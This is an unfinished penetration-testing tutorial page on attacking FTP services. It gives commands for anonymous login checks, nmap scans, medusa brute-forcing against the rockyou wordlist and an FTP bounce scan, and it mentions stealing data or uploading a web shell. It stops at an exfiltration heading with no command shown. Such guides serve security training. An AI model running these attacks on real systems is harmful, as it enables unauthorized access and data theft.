Common Service Attacks
NOTE: This page is under construction
Services
Network services as listed below commonly run standard default ports. Whilst most of your targets (especially internally) may run on default standard ports that you would expect services to run on it's important to look for non-standard, high ports as some sysadmins run their infrastructure under "Security Through Obscurity". To do this we can use third-party services such as Shodan and Censys and port scanners such as nmap.
FTP
File Transfer Protocol (FTP) is commonly used to store and transfer files and runs on port 21 by default. FTP if configured properly cannot be accessed without being vulnerable or using weak credentials. However if the server has misconfigurations (anonymous authentication) and weak credentials are in place then potentially it can be accessed. After which we can login, see if we have write permissions, steal data or upload a web shell.
- FTP Security: https://datatracker.ietf.org/doc/html/rfc2577
- FTP hacking cheat sheet: https://book.hacktricks.xyz/network-services-pentesting/pentesting-ftp
Basic FTP authentication (CLI):
- Basic FTP login:
ftp 10.10.10.11 21 - Feature rich FTP client:
ncftp -u admin -p Password123 10.10.10.11
Anonymous Login
A common security oversight and misconfiguration is an FTP server allowing anonymous login and it becomes even better if we have write permissions! To check for this misconfifration you can either manually try and login with anonymous:anonymous or use the nmap scripting engine to check automatically for you.
Check for FTP anonymous login:
ftp 10.10.10.11(anonymous:anonymous)sudo nmap -sC -sV 10.10.10.11 -p 21 -oA results
Brute-Force
Brute-Force attacks stuff logins with thousands and hundreds of thousands (even millions) of login attempts using a password word list against a user or a list of users guessing the users password until it finds the right one. If we cant get access to the FTP using the anonymous login method and assuming the sysadmin uses weak and guessable credentials we may be able to brute-force the login and break our way in. Note that this is a very loud and proud method and is not recommended if you're trying to be stealthy.
Brute-force using medusa and rockyou:
medusa -u admin -P /usr/share/wordlists/rockyou.txt -h 10.10.10.11 -M ftp
FTP Bounce
An FTP Bounce attack is an old attack against FTP where we can effectively use the target (hacked) server as a proxy to access other internal systems on the network externally. We can use this method to port scan an internal network however this is by default not available on modern FTP servers but is still worth checking for just in case your target is vulnerable to this attack.
nmap -Pn -v -n -p 80 -b anonymous:anonymous@10.10.10.11 <internal address>
Exfiltration
Once you find your way into an FTP server which has data that you want to exfiltrate on mass you can use wget to mass exfiltrate all the data from the server to your server.
Exfiltrate all data from the target server: